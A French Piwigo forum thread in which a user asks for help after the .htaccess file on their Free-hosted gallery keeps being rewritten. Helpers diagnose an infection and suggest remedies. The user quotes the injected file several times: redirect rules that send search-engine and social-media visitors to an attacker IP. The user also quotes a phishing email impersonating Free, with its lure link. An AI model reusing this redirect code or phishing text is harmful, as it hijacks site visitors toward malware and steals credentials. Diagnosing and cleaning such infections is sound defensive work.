•  » Utilisation
  •  » Faille Sécurité ? HT access / free

#1 2010-12-24 20:43:57

IIV6R32II
Membre
2010-12-24
4

Faille Sécurité ? HT access / free

Bonjour,

je fais appel aux dévelloppeurs pour résoudre un probleme de réinscription du fichier htaccess sans auorisation en effet ce fichier a une facheuse tendance à se modifier tous seul (..)  ce qui a ppour résultat  de rendre la gallerie inacessible
la galerie est hebergé chez free et apparemment il y'aurais peut etre un probleme de vérol mais lequel ??

ma question est donc la suivante comment empécher l'acces tiers au fichier .htacces ?

merci pour vôtre aide

ps: voici le contenu du fichier en question

php 5
<Files config.php>
deny from all
</Files>


et la version du serveur:



PHP Version 5.1.3RC4-dev

System  Linux phpn9-g5.priv.free.fr 
Build Date  Nov 5 2007 00:45:30 
Server API  CGI/FastCGI 
Virtual Directory Support  disabled 
Configuration File (php.ini) Path  /usr/php5/lib/php.ini 
PHP API  20041225 
PHP Extension  20050922 
Zend Extension  220051025 
Debug Build  no 
Thread Safety  disabled 
Zend Memory Manager  enabled 
IPv6 Support  disabled 
Registered PHP Streams  php, file, http, compress.bzip2, compress.zlib 
Registered Stream Socket Transports  tcp, udp 
Registered Stream Filters  string.rot13, string.toupper, string.tolower, string.strip_tags, convert.*,

Dernière modification par IIV6R32II (2010-12-24 20:48:43)

Hors ligne

#2 2010-12-24 23:21:41

ddtddt
Équipe Piwigo
Quetigny (21) - France
2007-07-27
16938

Re: Faille Sécurité ? HT access / free

Est ce que tu as autre chose que ta galerie qui tourne sur l'espace ?

Piwigo ne modifie pas le fichier .htaccess en fonctionnement normal

Se qui est possible c'est que tu es un virus :-(

si tu est chez free et que tu n'as que Piwigo dans le fichier .htaccess, il ne devrais y avoir que php1


Vous aimez Piwigo alors n'hésitez pas à participer avec nous, plus d'infos sur la page "Contribuer à Piwigo". Si vous n'avez pas beaucoup de temps et que vous souhaitez nous soutenir vous pouvez aussi le faire par un don.

Hors ligne

#3 2010-12-25 14:19:38

IIV6R32II
Membre
2010-12-24
4

Re: Faille Sécurité ? HT access / free

ddtddt a écrit:

Est ce que tu as autre chose que ta galerie qui tourne sur l'espace ?

Piwigo ne modifie pas le fichier .htaccess en fonctionnement normal

Se qui est possible c'est que tu es un virus :-(

si tu est chez free et que tu n'as que Piwigo dans le fichier .htaccess, il ne devrais y avoir que php1

Bonjour

non rien d'autre qui tourne sur la galerie il y'a d'inscrit PHP5 car la version du serveur est 5.2 donc poas de soucis de rétrocompatibilité

aujourdui encore le fichier a été récrit le voici désormais:

php 5
<Files config.php>
deny from all
</Files>
RewriteEngine On
#ErrorDocument 400 http://188.229.90.142/index.php?sa=00
#ErrorDocument 401 http://188.229.90.142/index.php?sa=00
#ErrorDocument 403 http://188.229.90.142/index.php?sa=00
#ErrorDocument 404 http://188.229.90.142/index.php?sa=00
#ErrorDocument 500 http://188.229.90.142/index.php?sa=00
#ErrorDocument 502 http://188.229.90.142/index.php?sa=00
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://188.229.90.142/index.php?sa=00 [R=

si quelqu'un a une idée je suis preneur car les ordi sont "propres" donc la vérol ne pourrais s'etre intercaler que sur le serveur ....

Hors ligne

#4 2010-12-25 20:33:38

Gotcha
Ex Equipe Piwigo
Pierrelatte (26)
2007-03-14
13331

Re: Faille Sécurité ? HT access / free

C'est un virus donc.
http://www.ip-adress.com/whois/188.229.90.142

Aussi il conviendra de désinfecter votre serveur. Dites-nous, quel est votre client FTP ?


Ayez comme premier réflexe de consulter le wiki.
Ensuite, veuillez effectuer une recherche sur le forum avant de poser votre question.

LE FAIRE EST LE REVELATEUR DE L'ETRE

Hors ligne

#5 2010-12-25 21:35:16

plg
Équipe Piwigo
Nantes, France, Europe
2002-04-05
12673

Re: Faille Sécurité ? HT access / free

En tout cas c'est tout à fait inquiétant et ce serait très intéressant de pouvoir analyser le log du serveur web pour savoir si c'est bien Piwigo ou une appli web qui a permis d'introduire ces modifications.

Cela peut tout aussi bien être un vol de vos identifiants FTP et là Piwigo n'est pas en cause.


Les historiens ont établi que Pierrick était le premier utilisateur connu de Piwigo.

Hors ligne

#6 2010-12-26 13:56:17

IIV6R32II
Membre
2010-12-24
4

Re: Faille Sécurité ? HT access / free

Effectivement  c'est inquiétant et très pénible aujourdui encore le fichier a été modifier et a rendu une n'eme fois la galerie indisponible

le client <FTP est Filezilla

voici le fichier a nouveau modifier
php 1
RewriteEngine On
ErrorDocument 400 http://188.229.90.142/index.php?sa=00
ErrorDocument 401 http://188.229.90.142/index.php?sa=00
ErrorDocument 403 http://188.229.90.142/index.php?sa=00
ErrorDocument 404 http://188.229.90.142/index.php?sa=00
ErrorDocument 500 http://188.229.90.142/index.php?sa=00
ErrorDocument 502 http://188.229.90.142/index.php?sa=00
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://188.229.90.142/index.php?sa=00 [R=301,L]

concernant les identifiants j'ai toujours utiliser ce serveur sans aucun problème j'avais même une php web gallerie il y'a de cela deux ou trois ans donc ...???

qui plus est free ne donne pas accès au log ftp.

Dernière modification par IIV6R32II (2010-12-26 14:16:38)

Hors ligne

#7 2010-12-26 16:34:44

Gotcha
Ex Equipe Piwigo
Pierrelatte (26)
2007-03-14
13331

Re: Faille Sécurité ? HT access / free

**** Courriel envoyé ****


Ayez comme premier réflexe de consulter le wiki.
Ensuite, veuillez effectuer une recherche sur le forum avant de poser votre question.

LE FAIRE EST LE REVELATEUR DE L'ETRE

Hors ligne

#8 2010-12-26 21:20:08

LucMorizur
Membre
Vienne (Isère, 38)
2009-03-01
1969

Re: Faille Sécurité ? HT access / free

Juste pour savoir, ça donne quoi si on suit les liens ?

Hors ligne

#9 2010-12-26 23:56:08

Mascarille
Membre
Lyon Avignon
2009-12-21
807

Re: Faille Sécurité ? HT access / free

Bonjour,
je pense qu'il s'agit de l'infection dont le mécanisme est décrit dans cet article (ou d'un dérivé) :
http://blog.unmaskparasites.com/2008/12 … s-exploit/
Cordialement


Photographe spectacle vivant : www.mascarille.com
Voyages : www.mascarille.com/tdm
Base de connaissance sur le théâtre : www.mascarille.fr
Photographes des Arts du Spectacle : www.passphotospectacle.com

Hors ligne

#10 2010-12-27 00:01:25

Mascarille
Membre
Lyon Avignon
2009-12-21
807

Re: Faille Sécurité ? HT access / free

Dans le même article, les conseils :

How to prevent re-infection?

Well, I still don’t know how all those site got infected. All I can suggest is common sense measures:

- Make sure your own computer is virus- and spyware-free. The most common function of trojans is stealing passwords.

- Use SFTP instead of FTP if possible. While FTP sends all data (including passwords) in clear text, SFTP encrypts everything making it almost impossible to intercept critical data.

- Change FTP and other passwords you use on the compromised web server. The new passwords should be strong (at least 7 characters long) and hard to guess.

- Scan your web server directories for suspicious files. Hackers could have left backdoor scripts.
Make sure only you can create/modify files on server. Directories should have 755 permissions and files 644 permissions. Such permissions will prevent hackers from modifying your server files via security holes in web scripts. If you don’t use .htaccess file, just create an empty read-only file (644) – don’t give hackers a chance to create it for you.

- Contact your hosting provider and ask them to investinate the issue. Ideally you do it before modifying the .htaccess file, so that they can find traces left by hackers.


Photographe spectacle vivant : www.mascarille.com
Voyages : www.mascarille.com/tdm
Base de connaissance sur le théâtre : www.mascarille.fr
Photographes des Arts du Spectacle : www.passphotospectacle.com

Hors ligne

#11 2010-12-27 10:56:30

ddtddt
Équipe Piwigo
Quetigny (21) - France
2007-07-27
16938

Re: Faille Sécurité ? HT access / free

Mascarille a écrit:

Dans le même article, les conseils :

How to prevent re-infection?

...........

- Contact your hosting provider and ask them to investinate the issue. Ideally you do it before modifying the .htaccess file, so that they can find traces left by hackers.

Ce qui serais merveilleux c'est que tu nous traduise en français ce que cela vaux dire ;-)


Vous aimez Piwigo alors n'hésitez pas à participer avec nous, plus d'infos sur la page "Contribuer à Piwigo". Si vous n'avez pas beaucoup de temps et que vous souhaitez nous soutenir vous pouvez aussi le faire par un don.

Hors ligne

#12 2010-12-27 21:12:50

Mascarille
Membre
Lyon Avignon
2009-12-21
807

Re: Faille Sécurité ? HT access / free

ddtddt a écrit:

Ce qui serais merveilleux c'est que tu nous traduise en français ce que cela vaux dire ;-)

Ok, mais sans garantie "littérale" - aidé par Google ! -

Comment faire pour empêcher la ré-infection? [entre crochets, mes commentaires]

Eh bien, je ne sais toujours pas comment tous ces sites ont été infectés. Tout ce que je peux suggérer, ce sont des mesures de bon sens:

- Assurez-vous que votre propre ordinateur [celui avec lequel vous accéder à votre serveur par FTP] ne contient aucun virus et spyware. La fonction la plus classique des chevaux de Troie est de récupérer les mots de passe.

- Utiliser si possible un FTP sécurisé au lieu d'un FTP. FTP envoie toutes les données (mots de passe y compris) en texte clair, un "SFTP" chiffre tout en rendant pratiquement impossible d'intercepter les données critiques.
[Je crois me souvenir d'un piratage de site Piwigo où le piratage s'était effectué en récupérant le mot de passe Fillezilla sur l'ordinateur de l'utilisateur et non sur le serveur - Le mot de passe Fillezilla n'est pas crypté sur l'ordinateur utilisateur - Ne pas demander à Fillezilla de le conserver d'une session à l'autre]

- Changer vos mots de passe FTP et les mots de passe que vous utilisez sur le serveur web attaqué. Le nouveau mot de passe doit être renforcé (au moins 7 caractères) et difficile à deviner.

- Analysez votre répertoire de serveurs Web pour les fichiers suspects. Les pirates auraient pu laisser des scripts utilisant une "porte dérobée". [port ouvert, j'imagine]

- Assurez-vous que vous pouvez créer / modifier des fichiers sur le serveur.
Les répertoires doivent avoir les autorisations 755 et les fichiers 644 autorisations. [Est-ce possible chez Free et compatible avec les maj automatiques de Piwigo ?]
Ces autorisations empêcher les pirates de la modification de votre serveur de fichiers via les failles de sécurité dans les scripts web.
Si vous n'utilisez pas de fichier htaccess, il suffit de créer un fichier vide en lecture seule (644) - ne pas donner aux pirates la possibilité de le créer à votre place.

- Communiquez avec votre fournisseur d'hébergement et de leur demander d'analyser le problème. Idéalement, faites le avant de modifier le fichier htaccess., afin qu'ils puissent trouver des traces laissées par les pirates. [vous avez gardé des copies, c'est l'essentiel]


Photographe spectacle vivant : www.mascarille.com
Voyages : www.mascarille.com/tdm
Base de connaissance sur le théâtre : www.mascarille.fr
Photographes des Arts du Spectacle : www.passphotospectacle.com

Hors ligne

#13 2010-12-27 21:24:19

ddtddt
Équipe Piwigo
Quetigny (21) - France
2007-07-27
16938

Re: Faille Sécurité ? HT access / free

Merci ;-)


Vous aimez Piwigo alors n'hésitez pas à participer avec nous, plus d'infos sur la page "Contribuer à Piwigo". Si vous n'avez pas beaucoup de temps et que vous souhaitez nous soutenir vous pouvez aussi le faire par un don.

Hors ligne

#14 2010-12-28 21:38:11

IIV6R32II
Membre
2010-12-24
4

Re: Faille Sécurité ? HT access / free

j'ai supprimer la galerie par prudence temporairement car rien n'empêchait la ré ecriture du fichier en question

en ce qui concerne les permissions, il est évident que le chmod ne permettait pas l'editon des fichiers distant mais la lecture seule simplement ..


@Gotcha merci , mais j'ai déja passé en revue l'ennsemeble des scripts et pages web sans rien y trouver

j'avais effectivement modifier un des header afin de le rendre plus personnel mais je ne pense pas que cela soit la cause de tous ces maux...

à lheure ou j'écrit la galerie n'étant plus en ligne, je viens d'y retrouver encore ce malheureux fichier ht acces avec la même adresse ip
Options -Indexes
RewriteEngine On
ErrorDocument 400 http://188.229.90.142/index.php?sa=00
ErrorDocument 401 http://188.229.90.142/index.php?sa=00
ErrorDocument 403 http://188.229.90.142/index.php?sa=00
ErrorDocument 404 http://188.229.90.142/index.php?sa=00
ErrorDocument 500 http://188.229.90.142/index.php?sa=00
ErrorDocument 502 http://188.229.90.142/index.php?sa=00
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://188.229.90.142/index.php?sa=00 [R=301,L]

j'ai recu également une tentaive de phishing (assez bien élaboré a dire vrai) sutr la boite mail de l'administration de la galerie :

la voici  :                     // EVIDEMMENT NE REMPLISSER PAS LE FORMULAIRE //

"   
   Sujet : Erreur de soustraction sur votre budget
   
Envoyé par 
"Free Administration" <Email--3mg@Assistance.fr>   Le : 26 Décembre 2010 23:06

À: *******@free.fr
Fichiers joints:   flfl_bg.gif (2.1 ko, télécharger)




Free Administration

Bonjour, cher (e) client (e) :

Apres plusieurs tentatives infructueuses de vous joindre par telephone ,nous vous envoyons ce mail pour vous informer qu une erreur est survenue lors des
prelevements mensuels effectues sur le compte de notre clientele.

En effet le 25 decembre 2010 votre compte a ete indument debite de la somme de (89.00) quatre vingt neuf Euros .

Ce probleme est essentiellement du la similitude de vos noms et prenoms avec ceux d un autre client .

A fin de proceder a un remboursement immediat nous vous prions de bien vouloir cliquer sur le lien ci-dessous et fournir toute information susceptible d accelerer ce remboursement .



Remplissez le formulaire de remboursement en cliquant sur le lien suivant: ttp://www.les50.ch/libraries/geshi/free.frinfo.nl/components/com_virtuemart/shop_image/product/resized/free.fr



Cordialement,

Fabrice Andre,
Directeur Service Client


*En cas de non reponse a ce message, Free decline toute responsabilite
juridique au non remboursement de la somme sus-citee.   "



avec un script en pj (extendu en .gif)

les fautes de syntaxes ne laissent pas dupe mais on se demande réellement si la personne derriere cette petite blague est vraiment en Roumanie comme pourrait le laissé penser le whois ip du fichier ht acces responsable.

Dernière modification par IIV6R32II (2010-12-28 21:45:42)

Hors ligne

#15 2010-12-29 14:07:13

Gotcha
Ex Equipe Piwigo
Pierrelatte (26)
2007-03-14
13331

Re: Faille Sécurité ? HT access / free

Les précautions à prendre sont simple :
Changements des mots de pass et surtout penser à supprimer les mots de pass enregistrés via votre logiciel de transfert FTP.
Après quoi, l'emploi du SFTP (SSH) serait plus sécuritaire :-)


Ayez comme premier réflexe de consulter le wiki.
Ensuite, veuillez effectuer une recherche sur le forum avant de poser votre question.

LE FAIRE EST LE REVELATEUR DE L'ETRE

Hors ligne

  •  » Utilisation
  •  » Faille Sécurité ? HT access / free

Pied de page des forums

Propulsé par FluxBB

github twitter newsletter Faire un don Piwigo.org © 2002-2024 · Contact